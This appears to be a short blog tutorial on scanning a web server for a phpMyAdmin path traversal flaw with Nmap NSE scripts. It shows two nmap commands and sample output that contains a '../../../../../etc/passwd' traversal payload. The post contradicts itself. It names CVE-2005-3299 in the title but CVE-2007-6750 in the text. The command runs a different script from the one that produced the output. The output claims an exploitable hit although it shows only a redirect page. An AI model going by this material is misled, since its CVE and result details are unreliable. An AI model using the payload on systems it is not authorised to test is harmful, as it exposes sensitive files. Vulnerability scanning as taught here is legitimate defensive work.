Path traversal (CVE-2005-3299) with NMAP

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

Nmap was first published in September 1997, as an article in Phrack Magazine with source-code included. With help and contributions of the computer security community, development continued.

In this post, I’m gonna show you how to find phpmyadmin path traversal (CVE-2007-6750) with NMAP.

Below is the example of the command with nmap’s NSE script. This script tests a web server for vulnerability if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.

nmap --script http-passwd --script-args http-passwd.root=/test/ <Target>
nmap -Pn --script vuln <Target>

Now if the target is vulnerable to this attack it will show the following result

| http-phpmyadmin-dir-traversal:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclu
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2
.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__red
irect parameter, possibly involving the subform array.
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <html>
|   <head>
|   <script>
|       var redirect = "https://" + window.location.host;
|       function redirectPage() {
|               window.location.href= redirect;
|       }
|   </script>
|   <noscript>
|       <META http-equiv='Refresh' content='0; URL='>

|   </noscript>
|   </head>
|   <body onLoad="redirectPage();">
|   Redirecting to SSL secured connection.
|   <p>
|   If your browser does not automatically redirect you, click
|   <script>
|       window.document.write("<a href=\"" + redirect + "\"> here </a>");
|   </script>
|   <noscript>
|   <a href=""> here </a>
|   </noscript>
|   </p>
|   </body>
|   </html>
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/


Video Proof of concept (PoC) of Path traversal attack



Please enter your comment!
Please enter your name here